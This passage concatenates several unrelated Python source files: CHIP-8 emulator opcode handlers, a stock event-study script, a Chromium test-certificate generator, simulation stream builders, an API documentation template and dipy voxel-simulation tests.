    hex digit, and runs of ``x``/``y``/``z`` capture operand fields (e.g.
    ``'8XY0'`` captures two single-digit operands).

    Fixes: ``dict.iteritems()`` (removed in Python 3 -- this file already
    opts into ``print_function``) replaced with ``items()``, and the loop
    variable ``id`` no longer shadows the builtin.
    """

    def __init__(self, op_map):
        # Pre-compile every pattern once; matching happens per instruction.
        processed = {}
        for pattern, f in op_map.items():
            s = self._build_pattern_groups(pattern.lower())
            processed[re.compile(s)] = f

        self.operations = processed

    def execute(self, context, op):
        """Find the handler matching ``op`` and invoke it.

        Captured operand fields are decoded from hex into ints. An unknown
        opcode trips the assert with the offending hex string.
        """
        s = "%04x" % op
        for pattern, f in self.operations.items():
            m = pattern.match(s)
            if m:
                return f(context, *[int(v, base=16) for v in m.groups()])
        assert False, s

    def _build_pattern_groups(self, pattern):
        # '?' -> any single character; each run of x/y/z becomes one capture
        # group of the same width.
        s = pattern.replace('?', '.')
        for marker in ['x', 'y', 'z']:
            m = re.search('%s+' % marker, s)
            if m:
                s = s[:m.start()] + ('(.{%s})' % (m.end() - m.start())) + s[m.end():]
        return '^' + s + '$'

def set_mem_v0_vx(context, x):
    """FX55: store registers V0..VX (inclusive) into memory starting at I.

    Fixed off-by-one: the original looped ``range(x)`` and so never wrote
    VX itself, inconsistent with its counterpart ``fill_v0_vx`` (FX65)
    which uses ``range(x + 1)``.
    """
    for i in range(x + 1):
        context.memory.write_byte(context.index_reg + i, context.v[i])
    context.pc += 2
    
def fill_v0_vx(context, x):
    """FX65: load memory at I..I+X into registers V0..VX (inclusive)."""
    base = context.index_reg
    for offset in range(x + 1):
        context.v[offset] = context.memory.get_byte(base + offset)
    context.pc += 2
    
def set_bcd_vx(context, x):
    """FX33: store the BCD digits of VX at I, I+1, I+2 (hundreds, tens, ones).

    Uses floor division ``//``: the original ``/`` yields floats under
    Python 3's true division, corrupting the stored digits.
    """
    val = int(context.v[x])
    context.memory.write_byte(context.index_reg, val // 100)
    context.memory.write_byte(context.index_reg + 1, val % 100 // 10)
    context.memory.write_byte(context.index_reg + 2, val % 10)
    context.pc += 2
        
def set_i_font(context, x):
    """FX29: point the index register at the font glyph for the digit in VX."""
    context.index_reg = context.memory.get_font_address(context.v[x])
    context.pc += 2
    
def add_reg_ind(context, x):
    """FX1E: add VX to the index register."""
    context.index_reg = context.index_reg + context.v[x]
    context.pc = context.pc + 2
        
def set_delay_timer(context, x):
    """FX15: load the delay timer from VX."""
    context.delay_timer = context.v[x]
    context.pc = context.pc + 2

def set_sound_timer(context, x):
    """FX18: load the sound timer from VX."""
    context.sound_timer = context.v[x]
    context.pc = context.pc + 2
    
def set_vx_key_pressed(context, x):
    """FX0A: block until a key is pressed, then store that key in VX."""
    context.v[x] = context.keypad.wait_for_keypress()
    context.pc += 2

def set_vx_delay_timer(context, x):
    """FX07: read the delay timer into VX."""
    context.v[x] = context.delay_timer
    context.pc = context.pc + 2
    
def skip_key_vx(context, x, result=True):
    """EX9E/EXA1: skip the next instruction depending on the key in VX.

    ``result=True`` skips when the key IS pressed; ``result=False`` skips
    when it is NOT pressed. Either way PC advances past this instruction.
    """
    if context.keypad.is_keypressed(context.v[x]) == result:
        context.pc += 2
    context.pc += 2
    
def draw_sprite(context, x, y, n):
    """DXYN: draw an N-byte sprite from memory[I..I+N-1] at (V[x], V[y]).

    V[F] receives the collision flag reported by the screen.
    """
    sprite = []
    for cb in range(n):
        sprite.append(context.memory.get_byte(context.index_reg + cb))
    collision = context.screen.draw(context.v[x], context.v[y], sprite)
    context.v[15] = collision
    context.pc += 2
            
def jump_nnn_v0(context, nnn):
    """BNNN: jump to address NNN plus V0."""
    context.pc = nnn + context.v[0]

def set_vx_rand(context, x, nn):
    """CXNN: set VX to a random byte ANDed with NN."""
    import random
    rand_byte = random.randint(0, 0xFF)
    context.v[x] = rand_byte & nn
    context.pc = context.pc + 2
    
def jump_noteq(context, x, y):
    """9XY0: skip the next instruction when VX != VY."""
    skip = 2 if context.v[x] != context.v[y] else 0
    context.pc += 2 + skip
    
def shift_vy_left(context, x, y):
    """8XYE: VX = VY << 1, with VF = the bit shifted out (MSB of VY).

    Fixes two defects in the original:
    - VF was computed from the *old VF* (``context.v[15] >> 7``) instead
      of from VY's most significant bit.
    - The result was wrapped with ``% 255`` instead of ``% 256``, so
      0x80 << 1 produced 1 rather than 0.
    """
    context.v[15] = (context.v[y] >> 7) & 0x1
    context.v[x] = (context.v[y] << 1) % 256
    context.pc += 2

def shift_right(context, x, y):
    """8XY6: VX = VY >> 1, with VF = the bit shifted out (LSB of VY)."""
    context.v[15] = context.v[y] & 0x1
    shifted = context.v[y] >> 1
    context.v[x] = shifted
    context.pc = context.pc + 2

def sub_vx_vy_vf(context, x, y):
    """8XY7 (SUBN): VX = VY - VX, with VF = 1 when VY > VX (no borrow).

    Fixes the original, which computed VX - VY (wrong operand order for
    8XY7 -- note its own VF test already checked VY > VX, the SUBN
    convention) and did not wrap the result into the 0..255 byte range.
    """
    logging.info('Setting V[X] = V[Y] - V[X], V[F] = 1 if V[Y] > V[X]')
    context.v[15] = 1 if context.v[y] > context.v[x] else 0
    context.v[x] = (context.v[y] - context.v[x]) % 256
    context.pc += 2
    
def add_vx_vy(context, x, y):
    """8XY4: VX += VY wrapped to a byte, with carry into VF."""
    logging.info('Setting V[X] = V[X] + V[Y]')
    total = context.v[x] + context.v[y]
    context.v[15] = int(total > 255)
    context.v[x] = total % 256
    context.pc += 2

def sub_vx_vy(context, x, y):
    """8XY5: VX = VX - VY, wrapped to a byte.

    NOTE(review): VF is set to 1 *on* borrow here; Cowgod's reference sets
    VF = 1 when there is NO borrow. Preserved as-is -- confirm which
    convention the rest of this emulator expects.
    """
    logging.info('Setting V[X] = V[X] - V[Y]')
    diff = context.v[x] - context.v[y]
    context.v[15] = int(diff < 0)
    context.v[x] = diff % 256
    context.pc += 2
    
def set_vx_or_vy(context, x, y):
    """8XY1: VX |= VY."""
    logging.info('Setting V[X] = V[X] | V[Y]')
    context.v[x] |= context.v[y]
    context.pc = context.pc + 2
    
def set_vx_xor_vy(context, x, y):
    """8XY3: VX ^= VY."""
    logging.info('Setting V[X] = V[X] ^ V[Y]')
    context.v[x] ^= context.v[y]
    context.pc = context.pc + 2

def set_vx_and_vy(context, x, y):
    """8XY2: VX &= VY."""
    logging.info('Setting V[X] = V[X] & V[Y]')
    context.v[x] &= context.v[y]
    context.pc = context.pc + 2

def set_vx_vy(context, x, y):
    """8XY0: copy VY into VX."""
    logging.info('Setting V[X] = V[Y]')
    context.v[x] = context.v[y]
    context.pc = context.pc + 2
    
def add_reg(context, x, nnn):
    """7XNN: add the immediate to VX, wrapped to a byte (no carry flag)."""
    logging.info('Adding NNN to V[X]')
    context.v[x] = (nnn + context.v[x]) % 256
    context.pc = context.pc + 2

def set_i(context, nnn):
    """ANNN: load NNN into the index register."""
    logging.info('Setting NNN to index_reg')
    context.index_reg = nnn
    context.pc = context.pc + 2

def pop_stack(context):
    """00EE: return from a subroutine by popping the return address into PC."""
    logging.info('Returning from a subroutine')
    context.pc = context.stack.pop()

def call_rca1082(context, address): #TODO
    # 0NNN: call an RCA 1802 machine-code routine -- deliberately unimplemented
    # (modern interpreters ignore this opcode).
    # NOTE(review): pc += 1 looks wrong; every other opcode advances pc by 2
    # (instructions are 2 bytes) -- confirm before relying on this stub.
    print("operation not implemented yet:", address)
    context.pc += 1 

def clear(context):
    """00E0: clear the screen."""
    logging.info('Clearing screen')
    context.screen.clear()
    context.pc += 2

def jump(context, address):
    """1NNN: unconditional jump."""
    logging.info('Jump at 0x%2x address' % address)
    context.pc = address

def call(context, address):
    """2NNN: push the return address (next instruction) and jump."""
    logging.info('Calling subroutine at 0x%2x address' % address)
    return_address = context.pc + 2
    context.stack.append(return_address)
    context.pc = address

def skip_equal(context, x, nnn, ifeq=True):
    """3XNN/4XNN: skip the next instruction when (VX == NN) matches ``ifeq``."""
    logging.info('Skip if V[X] === NNN is %s' % ifeq)
    matched = context.v[x] == nnn
    context.pc += 4 if matched == ifeq else 2

def skip_eq_reg(context, x, y):
    """5XY0: skip the next instruction when VX == VY."""
    logging.info('Skip if V[X] === V[Y]')
    context.pc += 4 if context.v[x] == context.v[y] else 2

def set_reg(context, x, nnn):
    """6XNN: load the immediate into VX."""
    logging.info('Set NNN to cpu reg V[x]')
    context.v[x] = nnn
    context.pc = context.pc + 2

# Opcode dispatch table. '?' matches any hex digit; runs of X/Y/Z capture
# operand fields (see Executor._build_pattern_groups).
op_map = {
    '0?E0': clear,
    '0?EE': pop_stack,
    '0XXX': call_rca1082,
    '1XXX': jump,
    '2XXX': call,
    '3XYY': skip_equal,
    '4XYY': lambda context, x, nn: skip_equal(context, x, nn, ifeq = False),
    '5XY0': skip_eq_reg,
    '6XYY': set_reg,
    '7XYY': add_reg,
    '8XY0': set_vx_vy,
    '8XY1': set_vx_or_vy,
    '8XY2': set_vx_and_vy,
    '8XY3': set_vx_xor_vy,
    '8XY4': add_vx_vy,
    '8XY5': sub_vx_vy,
    '8XY6': shift_right,
    '8XY7': sub_vx_vy_vf,
    '8XYE': shift_vy_left,
    '9XY0': jump_noteq,
    'AXXX': set_i,
    'BXXX': jump_nnn_v0,
    'CXYY': set_vx_rand,
    'DXYZ': draw_sprite,
    # EX9E skips when the key in VX IS pressed; EXA1 when it is NOT.
    # Fixed: the original mapped them the other way around, and its EX9E
    # lambda dropped the `context` argument entirely (TypeError on use).
    'EX9E': skip_key_vx,
    'EXA1': lambda context, x: skip_key_vx(context, x, result=False),
    'FX07': set_vx_delay_timer,
    'FX0A': set_vx_key_pressed,
    'FX15': set_delay_timer,
    'FX18': set_sound_timer,
    'FX1E': add_reg_ind,
    'FX29': set_i_font,
    'FX33': set_bcd_vx,
    'FX55': set_mem_v0_vx,
    'FX65': fill_v0_vx
}



# -*- coding: utf-8 -*-
"""
Created on Thu Jan 03 10:16:39 2013

@author: Grahesh
"""

import pandas 
from qstkutil import DataAccess as da
import numpy as np
import math
import copy
import qstkutil.qsdateutil as du
import datetime as dt
import qstkutil.DataAccess as da
import qstkutil.tsutil as tsu
import qstkstudy.EventProfiler as ep

"""
Accepts a list of symbols along with start and end date
Returns the Event Matrix which is a pandas Datamatrix
Event matrix has the following structure :
    |IBM |GOOG|XOM |MSFT| GS | JP |
(d1)|nan |nan | 1  |nan |nan | 1  |
(d2)|nan | 1  |nan |nan |nan |nan |
(d3)| 1  |nan | 1  |nan | 1  |nan |
(d4)|nan |  1 |nan | 1  |nan |nan |
...................................
...................................
Also, d1 = start date
nan = no information about any event.
1 = status bit (positively confirms the event occurrence)
"""

# Get the data from the data store
storename = "NSEData" # get data from our daily prices source
# Available field names: open, close, high, low, close, actual_close, volume
closefield = "close"    # price field used to compute event returns
volumefield = "volume"  # NOTE(review): not read anywhere below -- confirm needed
window = 10             # NOTE(review): not read anywhere below -- confirm needed

def getHalfYearEndDates(timestamps):
    """Return the trading day preceding the first April and first October
    session of each year covered by ``timestamps``.

    Only ``.year`` and ``.month`` of each element are inspected, and the
    final element is never considered a trigger (the loop stops one short).

    NOTE(review): a trigger at index 0 would append ``timestamps[-1]`` (the
    last element) -- behavior preserved from the original; confirm intended.
    """
    half_year_ends = []
    current_year = timestamps[0].year
    april_pending = 1

    for idx in range(len(timestamps) - 1):
        ts = timestamps[idx]
        if ts.year != current_year:
            continue
        if ts.month == 4 and april_pending == 1:
            half_year_ends.append(timestamps[idx - 1])
            april_pending = 0
        if ts.month == 10:
            half_year_ends.append(timestamps[idx - 1])
            current_year = ts.year + 1
            april_pending = 1

    return half_year_ends
        

def findEvents(symbols, startday, endday, marketSymbol, verbose=False):
    """Build the half-year-end event matrix for ``symbols``.

    Returns a pandas datamatrix indexed by timestamp with one column per
    symbol: 1.0 marks an event on that date, NaN means no event.

    Fixed: the Python-2-only ``print`` statements are now ``print(...)``
    calls, which behave identically on Python 2 for a single argument and
    keep the module importable on Python 3.
    """
    # Reading the Data for the list of Symbols.
    timeofday = dt.timedelta(hours=16)
    timestamps = du.getNSEdays(startday, endday, timeofday)

    endOfHalfYear = getHalfYearEndDates(timestamps)

    dataobj = da.DataAccess('NSEData')
    if verbose:
        print(__name__ + " reading data")
    # Reading the Data
    close = dataobj.get_data(timestamps, symbols, closefield)

    # Completing the Data - Removing the NaN values from the Matrix:
    # forward-fill first, then back-fill any leading NaNs.
    close = (close.fillna(method='ffill')).fillna(method='backfill')

    # Calculating Daily Returns for the Market (in place)
    tsu.returnize0(close.values)

    # Calculating the Returns of the Stock Relative to the Market.
    # So if a stock went up 5% and the market rose 3%, the return
    # relative to the market is 2%.
    mktneutDM = close - close[marketSymbol]

    # Start from an all-NaN copy with the same index/columns.
    np_eventmat = copy.deepcopy(mktneutDM)
    for sym in symbols:
        for time in timestamps:
            np_eventmat[sym][time] = np.NAN

    if verbose:
        print(__name__ + " finding events")

    # Generating the Event Matrix.
    # Event described is: analyzing half-year events for the given stocks.
    for symbol in symbols:
        for i in endOfHalfYear:
            np_eventmat[symbol][i] = 1.0  # overwriting by the bit, marking the event

    return np_eventmat


#################################################
################ MAIN CODE ######################
#################################################


# Load the NSE-500 portfolio symbol list (byte strings up to 13 chars).
symbols = np.loadtxt('NSE500port.csv',dtype='S13',comments='#', skiprows=1)
# You might get a message about some files being missing, don't worry about it.

#symbols =['SPY','BFRE','ATCS','RSERF','GDNEF','LAST','ATTUF','JBFCF','CYVA','SPF','XPO','EHECF','TEMO','AOLS','CSNT','REMI','GLRP','AIFLY','BEE','DJRT','CHSTF','AICAF']
#symbols=['NSE','3MINDIA.NS','AARTIIND.NS','ABAN.NS','ABB.NS','ABGSHIP.NS','ABIRLANUV.NS','ACC.NS','ADANIENT.NS','ADANIPORT.NS','ADANIPOWE.NS','ADVANTA.NS','ALLCARGO.NS','AIAENG.NS','AIL.NS','AZKOINDIA.NS']


# Study window: calendar year 2011.
startday = dt.datetime(2011,1,1)
endday = dt.datetime(2012,1,1)
eventMatrix = findEvents(symbols,startday,endday,marketSymbol='NSE500',verbose=True)

eventMatrix.to_csv('eventmatrix.csv', sep=',')

# Profile market-neutral returns 20 trading days either side of each event.
eventProfiler = ep.EventProfiler(eventMatrix,startday,endday,lookback_days=20,lookforward_days=20,verbose=True)

eventProfiler.study(filename="HalfYearEventStudy.jpg",plotErrorBars=True,plotMarketNeutral=True,plotEvents=False,marketSymbol='NSE500')



#!/usr/bin/python
# Copyright (c) 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""
A chain with four possible intermediates with different notBefore and notAfter
dates, for testing path building prioritization.
"""

import sys
sys.path += ['../..']

import gencerts

# Validity endpoints in ASN.1 UTCTime format (YYMMDDHHMMSSZ), ordered
# A < B < C < D.
DATE_A = '150101120000Z'
DATE_B = '150102120000Z'
DATE_C = '180101120000Z'
DATE_D = '180102120000Z'


# Root spans the full range so every intermediate chains to it.
root = gencerts.create_self_signed_root_certificate('Root')
root.set_validity_range(DATE_A, DATE_D)

# Four intermediates share the same subject name and (via set_key below) the
# same key, so they are interchangeable during path building and differ only
# in their validity windows.
int_ac = gencerts.create_intermediate_certificate('Intermediate', root)
int_ac.set_validity_range(DATE_A, DATE_C)

int_ad = gencerts.create_intermediate_certificate('Intermediate', root)
int_ad.set_validity_range(DATE_A, DATE_D)
int_ad.set_key(int_ac.get_key())

int_bc = gencerts.create_intermediate_certificate('Intermediate', root)
int_bc.set_validity_range(DATE_B, DATE_C)
int_bc.set_key(int_ac.get_key())

int_bd = gencerts.create_intermediate_certificate('Intermediate', root)
int_bd.set_validity_range(DATE_B, DATE_D)
int_bd.set_key(int_ac.get_key())

# Target is issued by int_ac but verifies against any of the four.
target = gencerts.create_end_entity_certificate('Target', int_ac)
target.set_validity_range(DATE_A, DATE_D)


gencerts.write_chain('The root', [root], out_pem='root.pem')
gencerts.write_chain('Intermediate with validity range A..C',
                     [int_ac], out_pem='int_ac.pem')
gencerts.write_chain('Intermediate with validity range A..D',
                     [int_ad], out_pem='int_ad.pem')
gencerts.write_chain('Intermediate with validity range B..C',
                     [int_bc], out_pem='int_bc.pem')
gencerts.write_chain('Intermediate with validity range B..D',
                     [int_bd], out_pem='int_bd.pem')
gencerts.write_chain('The target', [target], out_pem='target.pem')


# Copyright (c) 2017 David Sorokin <david.sorokin@gmail.com>
#
# Licensed under BSD3. See the LICENSE.txt file in the root of this distribution.

from simulation.aivika.modeler.model import *
from simulation.aivika.modeler.port import *
from simulation.aivika.modeler.stream import *
from simulation.aivika.modeler.data_type import *
from simulation.aivika.modeler.pdf import *

def _random_delay_stream(transact_type, code_suffix):
    """Shared builder for all random-delay transact streams.

    Validates ``transact_type``, emits the common Haskell ``mapStream``
    wrapper followed by ``code_suffix`` (the distribution-specific stream
    call), and returns the bound :class:`StreamPort`.

    Factored out of thirteen functions that repeated this boilerplate
    verbatim; the generated code is byte-identical to before.
    """
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += code_suffix
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def uniform_random_stream(transact_type, min_delay, max_delay):
    """Return a new stream of transacts with random delays distributed uniformly."""
    return _random_delay_stream(
        transact_type,
        'randomUniformStream ' + str(min_delay) + ' ' + str(max_delay))

def uniform_int_random_stream(transact_type, min_delay, max_delay):
    """Return a new stream of transacts with integer random delays distributed uniformly."""
    return _random_delay_stream(
        transact_type,
        'randomUniformIntStream ' + str(min_delay) + ' ' + str(max_delay))

def triangular_random_stream(transact_type, min_delay, median_delay, max_delay):
    """Return a new stream of transacts with random delays having the triangular distribution."""
    return _random_delay_stream(
        transact_type,
        'randomTriangularStream ' + str(min_delay) + ' ' + str(median_delay) + ' ' + str(max_delay))

def normal_random_stream(transact_type, mean_delay, delay_deviation):
    """Return a new stream of transacts with random delays having the normal distribution."""
    return _random_delay_stream(
        transact_type,
        'randomNormalStream ' + str(mean_delay) + ' ' + str(delay_deviation))

def lognormal_random_stream(transact_type, normal_mean_delay, normal_delay_deviation):
    """Return a new stream of transacts with random delays having the lognormal distribution.

       The numerical parameters are related to the normal distribution that
       this distribution is derived from.
    """
    return _random_delay_stream(
        transact_type,
        'randomLogNormalStream ' + str(normal_mean_delay) + ' ' + str(normal_delay_deviation))

def exponential_random_stream(transact_type, mean_delay):
    """Return a new stream of transacts with random delays having the exponential distribution with the specified mean (a reciprocal of the rate)."""
    return _random_delay_stream(
        transact_type,
        'randomExponentialStream ' + str(mean_delay))

def erlang_random_stream(transact_type, scale, shape):
    """Return a new stream of transacts with random delays having the Erlang distribution with the specified scale (a reciprocal of the rate) and shape parameters."""
    return _random_delay_stream(
        transact_type,
        'randomErlangStream ' + str(scale) + ' ' + str(shape))

def poisson_random_stream(transact_type, mean_delay):
    """Return a new stream of transacts with random delays having the Poisson distribution with the specified mean."""
    return _random_delay_stream(
        transact_type,
        'randomPoissonStream ' + str(mean_delay))

def binomial_random_stream(transact_type, probability, trials):
    """Return a new stream of transacts with random delays having the binomial distribution with the specified probability and trials."""
    return _random_delay_stream(
        transact_type,
        'randomBinomialStream ' + str(probability) + ' ' + str(trials))

def gamma_random_stream(transact_type, shape, scale):
    """Return a new stream of transacts with random delays having the Gamma distribution by the specified shape and scale."""
    return _random_delay_stream(
        transact_type,
        'randomGammaStream ' + str(shape) + ' ' + str(scale))

def beta_random_stream(transact_type, alpha, beta):
    """Return a new stream of transacts with random delays having the Beta distribution by the specified shape parameters (alpha and beta)."""
    return _random_delay_stream(
        transact_type,
        'randomBetaStream ' + str(alpha) + ' ' + str(beta))

def weibull_random_stream(transact_type, shape, scale):
    """Return a new stream of transacts with random delays having the Weibull distribution by the specified shape and scale."""
    return _random_delay_stream(
        transact_type,
        'randomWeibullStream ' + str(shape) + ' ' + str(scale))

def discrete_random_stream(transact_type, pdf):
    """Return a new stream of transacts with random delays having the discrete distribution by the specified probability density function."""
    return _random_delay_stream(
        transact_type,
        'randomDiscreteStream ' + encode_pdf(pdf))

# apis_v1/documentation_source/voter_star_on_save_doc.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-


def voter_star_on_save_doc_template_values(url_root):
    """
    Show documentation about voterStarOnSave
    """
    # This function only assembles static documentation data; it performs no
    # API calls itself. ``url_root`` is passed through for link construction.
    required_query_parameter_list = [
        {
            'name':         'api_key',
            'value':        'string (from post, cookie, or get (in that order))',  # boolean, integer, long, string
            'description':  'The unique key provided to any organization using the WeVoteServer APIs',
        },
        {
            'name':         'voter_device_id',
            'value':        'string',  # boolean, integer, long, string
            'description':  'An 88 character unique identifier linked to a voter record on the server',
        },
        {
            'name':         'kind_of_ballot_item',
            'value':        'string',  # boolean, integer, long, string
            'description':  'What is the type of ballot item for which we are saving the \'on\' status? '
                            '(kind_of_ballot_item is either "OFFICE", "CANDIDATE", "POLITICIAN" or "MEASURE")',
        },
        {
            'name':         'ballot_item_id',
            'value':        'integer',  # boolean, integer, long, string
            'description':  'The unique internal identifier for this ballot_item '
                            '(either ballot_item_id OR ballot_item_we_vote_id required -- not both. '
                            'If it exists, ballot_item_id is used instead of ballot_item_we_vote_id)',
        },
        {
            'name':         'ballot_item_we_vote_id',
            'value':        'string',  # boolean, integer, long, string
            'description':  'The unique identifier for this ballot_item across all networks '
                            '(either ballot_item_id OR ballot_item_we_vote_id required -- not both. '
                            'NOTE: In the future we might support other identifiers used in the industry.',
        },
    ]
    optional_query_parameter_list = [
    ]

    # Status strings the endpoint can return, shown in the docs page.
    potential_status_codes_list = [
        {
            'code':         'VALID_VOTER_DEVICE_ID_MISSING',
            'description':  'Cannot proceed. A valid voter_device_id parameter was not included.',
        },
        {
            'code':         'VALID_VOTER_ID_MISSING',
            'description':  'Cannot proceed. Missing voter_id while trying to save.',
        },
        {
            'code':         'STAR_ON_OFFICE CREATE/UPDATE ITEM_STARRED',
            'description':  '',
        },
        {
            'code':         'STAR_ON_CANDIDATE CREATE/UPDATE ITEM_STARRED',
            'description':  '',
        },
        {
            'code':         'STAR_ON_MEASURE CREATE/UPDATE ITEM_STARRED',
            'description':  '',
        },
    ]

    # Pre-filled values for the interactive "try now" link.
    try_now_link_variables_dict = {
        'kind_of_ballot_item': 'CANDIDATE',
        'ballot_item_id': '5655',
    }

    # Example JSON response body rendered verbatim on the docs page.
    api_response = '{\n' \
                   '  "status": string (description of what happened),\n' \
                   '  "success": boolean (did the save happen?),\n' \
                   '  "ballot_item_id": integer,\n' \
                   '  "ballot_item_we_vote_id": string,\n' \
                   '  "kind_of_ballot_item": string (CANDIDATE, MEASURE),\n' \
                   '}'

    template_values = {
        'api_name': 'voterStarOnSave',
        'api_slug': 'voterStarOnSave',
        'api_introduction':
            "Save or create private 'star on' state for the current voter for a measure, an office or candidate.",
        'try_now_link': 'apis_v1:voterStarOnSaveView',
        'try_now_link_variables_dict': try_now_link_variables_dict,
        'url_root': url_root,
        'get_or_post': 'GET',
        'required_query_parameter_list': required_query_parameter_list,
        'optional_query_parameter_list': optional_query_parameter_list,
        'api_response': api_response,
        'api_response_notes':
            "",
        'potential_status_codes_list': potential_status_codes_list,
    }
    return template_values

import numpy as np

from nose.tools import (assert_true, assert_false, assert_equal,
                        assert_almost_equal)
from numpy.testing import (assert_array_equal, assert_array_almost_equal,
                           assert_)

from dipy.sims.voxel import (_check_directions, SingleTensor, MultiTensor,
                             multi_tensor_odf, all_tensor_evecs, add_noise,
                             single_tensor, sticks_and_ball, multi_tensor_dki,
                             kurtosis_element, DKI_signal)
from dipy.core.geometry import (vec2vec_rotmat, sphere2cart)
from dipy.data import get_data, get_sphere
from dipy.core.gradients import gradient_table
from dipy.io.gradients import read_bvals_bvecs


# Module-level fixtures: a 64-direction gradient table shipped with dipy.
fimg, fbvals, fbvecs = get_data('small_64D')
bvals, bvecs = read_bvals_bvecs(fbvals, fbvecs)
gtab = gradient_table(bvals, bvecs)

# 2 shells for techniques that require multishell data:
# same directions repeated with doubled b-values.
bvals_2s = np.concatenate((bvals, bvals * 2), axis=0)
bvecs_2s = np.concatenate((bvecs, bvecs), axis=0)
gtab_2s = gradient_table(bvals_2s, bvecs_2s)


def diff2eigenvectors(dx, dy, dz):
    """ numerical derivatives 2 eigenvectors

    Builds a 3x3 eigenvector frame whose first column is the normalized
    direction (dx, dy, dz); the remaining columns come from rotating the
    second and third columns of ``basis``.

    NOTE(review): ``basis`` is not defined anywhere visible in this module,
    so calling this function raises NameError -- appears to be dead or
    vestigial code; confirm before use.
    """
    u = np.array([dx, dy, dz])
    u = u / np.linalg.norm(u)
    R = vec2vec_rotmat(basis[:, 0], u)
    eig0 = u
    eig1 = np.dot(R, basis[:, 1])
    eig2 = np.dot(R, basis[:, 2])
    eigs = np.zeros((3, 3))
    eigs[:, 0] = eig0
    eigs[:, 1] = eig1
    eigs[:, 2] = eig2
    return eigs, R


def test_check_directions():
    """_check_directions converts (theta, phi) angle pairs in degrees to
    unit cartesian sticks, and passes through 3-vectors unchanged."""
    # Testing spherical angles for two principal coordinate axis
    angles = [(0, 0)]  # axis z
    sticks = _check_directions(angles)
    assert_array_almost_equal(sticks, [[0, 0, 1]])
    angles = [(0, 90)]  # axis z again (phi can be anything if theta is zero)
    sticks = _check_directions(angles)
    assert_array_almost_equal(sticks, [[0, 0, 1]])
    angles = [(90, 0)]  # axis x
    sticks = _check_directions(angles)
    assert_array_almost_equal(sticks, [[1, 0, 0]])
    # Testing if directions are already given in cartesian coordinates
    angles = [(0, 0, 1)]
    sticks = _check_directions(angles)
    assert_array_almost_equal(sticks, [[0, 0, 1]])
    # Testing more than one direction simultaneously
    angles = np.array([[90, 0], [30, 0]])
    sticks = _check_directions(angles)
    ref_vec = [np.sin(np.pi*30/180), 0, np.cos(np.pi*30/180)]
    assert_array_almost_equal(sticks, [[1, 0, 0], ref_vec])
    # Testing directions not aligned to planes x = 0, y = 0, or z = 0
    the1 = 0
    phi1 = 90
    the2 = 30
    phi2 = 45
    angles = np.array([(the1, phi1), (the2, phi2)])
    sticks = _check_directions(angles)
    # Reference vectors via the standard spherical-to-cartesian formulas.
    ref_vec1 = (np.sin(np.pi*the1/180) * np.cos(np.pi*phi1/180),
                np.sin(np.pi*the1/180) * np.sin(np.pi*phi1/180),
                np.cos(np.pi*the1/180))
    ref_vec2 = (np.sin(np.pi*the2/180) * np.cos(np.pi*phi2/180),
                np.sin(np.pi*the2/180) * np.sin(np.pi*phi2/180),
                np.cos(np.pi*the2/180))
    assert_array_almost_equal(sticks, [ref_vec1, ref_vec2])


def test_sticks_and_ball():
    """A single stick at 100% volume fraction must reduce to a single
    tensor with one nonzero eigenvalue along the stick direction."""
    d = 0.0015
    S, sticks = sticks_and_ball(gtab, d=d, S0=1, angles=[(0, 0), ],
                                fractions=[100], snr=None)
    assert_array_equal(sticks, [[0, 0, 1]])
    # Equivalent single tensor: eigenvalue d along z (evecs column order
    # maps the first eigenvalue to the z axis here).
    S_st = SingleTensor(gtab, 1, evals=[d, 0, 0], evecs=[[0, 0, 0],
                                                         [0, 0, 0],
                                                         [1, 0, 0]])
    assert_array_almost_equal(S, S_st)


def test_single_tensor():
    """SingleTensor must preserve S0 on b0 volumes, attenuate diffusion
    volumes, and round-trip through a DTI fit to the expected FA."""
    evals = np.array([1.4, .35, .35]) * 10 ** (-3)
    evecs = np.eye(3)
    S = SingleTensor(gtab, 100, evals, evecs, snr=None)
    assert_array_almost_equal(S[gtab.b0s_mask], 100)
    assert_(np.mean(S[~gtab.b0s_mask]) < 100)

    # Local import keeps the reconstruction dependency out of module scope.
    from dipy.reconst.dti import TensorModel
    m = TensorModel(gtab)
    t = m.fit(S)

    # FA expected for these eigenvalues; 0.707 matches evals [1.4, .35, .35]e-3.
    assert_array_almost_equal(t.fa, 0.707, decimal=3)


def test_multi_tensor():
    """MultiTensor of two 50/50 fibers equals the mean of two single tensors."""
    sphere = get_sphere('symmetric724')
    vertices = sphere.vertices
    mevals = np.array(([0.0015, 0.0003, 0.0003],
                       [0.0015, 0.0003, 0.0003]))
    axis_a = np.array([np.sqrt(2) / 2., np.sqrt(2) / 2., 0])
    axis_b = np.array([0, np.sqrt(2) / 2., np.sqrt(2) / 2.])
    mevecs = [all_tensor_evecs(axis_a), all_tensor_evecs(axis_b)]
    # odf = multi_tensor_odf(vertices, [0.5, 0.5], mevals, mevecs)
    # assert_(odf.shape == (len(vertices),))
    # assert_(np.all(odf <= 1) & np.all(odf >= 0))

    fimg, fbvals, fbvecs = get_data('small_101D')
    bvals, bvecs = read_bvals_bvecs(fbvals, fbvecs)
    gtab = gradient_table(bvals, bvecs)

    # Build the expected signal as the equal-weight average of the two
    # single-fiber signals.
    signal_a = single_tensor(gtab, 100, mevals[0], mevecs[0], snr=None)
    signal_b = single_tensor(gtab, 100, mevals[1], mevecs[1], snr=None)
    expected = 0.5 * signal_a + 0.5 * signal_b

    S, sticks = MultiTensor(gtab, mevals, S0=100,
                            angles=[(90, 45), (45, 90)],
                            fractions=[50, 50], snr=None)

    assert_array_almost_equal(S, expected)


def test_snr():
    """Variance of added rician noise should approximate (1/SNR)**2."""
    # Fixed seed so the noise realizations below are reproducible.
    np.random.seed(1978)

    s = single_tensor(gtab)

    # For reasonably large SNR, var(signal) ~= sigma**2, where sigma = 1/SNR
    for snr in [5, 10, 20]:
        sigma = 1.0 / snr
        # NOTE(review): only the *last* of these 1000 realizations is kept --
        # s_noise is overwritten each pass, so the loop mostly just advances
        # the RNG.  Presumably the intent was to average over realizations;
        # confirm before simplifying, because removing the loop changes which
        # random draws reach the assertion below.
        for j in range(1000):
            s_noise = add_noise(s, snr, 1, noise_type='rician')

        # Variance of the noise across the signal samples should match
        # sigma**2 to about two decimals.
